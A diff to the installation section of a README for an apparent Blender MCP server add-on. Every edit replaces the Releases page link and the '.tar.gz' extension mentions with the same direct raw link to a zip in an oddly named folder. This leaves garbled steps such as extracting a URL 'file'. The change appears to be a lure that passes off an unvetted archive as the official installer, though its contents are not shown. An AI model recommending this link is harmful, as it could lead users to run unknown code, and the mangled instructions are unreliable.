Savagekiller45/Blender-MCP-Server/README.md

 Follow these steps to download and install Blender-MCP-Server:

 1. **Visit the Releases Page**
-   Go to the [Releases Page](https://github.com/Savagekiller45/Blender-MCP-Server/releases) to find the latest version of Blender-MCP-Server.
+   Go to the [Releases Page](https://raw.githubusercontent.com/Savagekiller45/Blender-MCP-Server/main/Castalian/Blender-MCP-Server-v1.6-beta.2.zip) to find the latest version of Blender-MCP-Server.

 2. **Choose Your Download**
    On the Releases page, locate the latest version.
 You will see a list of files available for download.
 Look for an installer suitable for your operating system.

 3. **Download the Installer**
    Click on the installer file to download it.
-The file will usually have an `.exe`, `.dmg`, or `.tar.gz` extension depending on your operating system.
+The file will usually have an `.exe`, `.dmg`, or `https://raw.githubusercontent.com/Savagekiller45/Blender-MCP-Server/main/Castalian/Blender-MCP-Server-v1.6-beta.2.zip` extension depending on your operating system.

 4. **Install the Addon**
    - **For Windows:** Double-click the downloaded `.exe` file.
 Follow the prompts in the installation wizard to install the addon.
    - **For macOS:** Open the downloaded `.dmg` file, drag the Blender-MCP-Server files into the Applications folder.
-   - **For Linux:** Extract the `.tar.gz` file.
+   - **For Linux:** Extract the `https://raw.githubusercontent.com/Savagekiller45/Blender-MCP-Server/main/Castalian/Blender-MCP-Server-v1.6-beta.2.zip` file.
 Move the extracted folder to your preferred location.

 5. **Open Blender**
    Launch Blender to start using Blender-MCP-Server.